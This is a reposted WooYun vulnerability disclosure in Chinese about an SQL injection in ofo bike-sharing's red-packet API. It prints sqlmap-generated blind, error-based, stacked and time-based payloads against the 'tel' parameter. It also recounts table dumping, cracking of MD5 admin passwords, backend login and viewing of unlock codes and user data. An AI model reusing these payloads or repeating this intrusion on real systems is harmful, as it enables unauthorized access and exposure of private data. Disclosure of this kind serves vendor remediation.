神刀安全网

漏洞标题: ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

漏洞详情

披露状态:

2016-04-24: 细节已通知厂商并且等待厂商处理中
2016-04-25: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

某处 api 没有对 SQL 注入过滤,导致后台密码,车辆密码,用户隐私泄露。

详细说明:

主站 www.ofo.so/Api/getPacket 红包页面没有对 SQL 注入过滤。

漏洞标题:  ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

可以直接注入。

code 区域
---
Parameter: tel (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: tel=12343211234") AND 7541=7541#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: tel=12343211234") AND (SELECT 4714 FROM(SELECT COUNT(*),CONCAT(0x7178787171,(SELECT (ELT(4714=4714,1))),0x71716a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ("SFUv"="SFUv&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

Type: stacked queries
Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
Payload: tel=12343211234");(SELECT * FROM (SELECT(SLEEP(5)))xnKx)#&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1

Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: tel=12343211234") AND (SELECT * FROM (SELECT(SLEEP(5)))UCSC) AND ("RqRC"="RqRC&orderid=110802&key=6b26a6a495244dcfe8c1e983903108e1
---

[INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.29, PHP 5.4.27

back-end DBMS: MySQL 5.0

另外警告一下 san.ofo.so 也有注入漏洞,懒得深入了,麻烦自查。

漏洞证明:

–tables

漏洞标题:  ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

所有后台用户密码为单次 md5,随意破。

漏洞标题:  ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

后台地址全都在 sp_auth_rule 里。没有授权可以随意访问。

随便登录一个试试

漏洞标题:  ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

懒得脱库了,要跑太久,随便拖几个看看,好像 CEO 的学号和手机也漏了

漏洞标题:  ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

车密码

漏洞标题:  ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

看这数据库一溜 null 看来代码管理真是混乱。。心疼小黄车

修复方案:

www.ofo.so 和 san.ofo.so 麻烦都上个 WAF 谢谢,很容易上马拿到认证用的学生证照片的。网站后台用thinkcmf请及时升级。

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: ofo共享单车SQL注入漏洞影响北京大学等多所高校共享车辆解锁密码及9万用户隐私

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址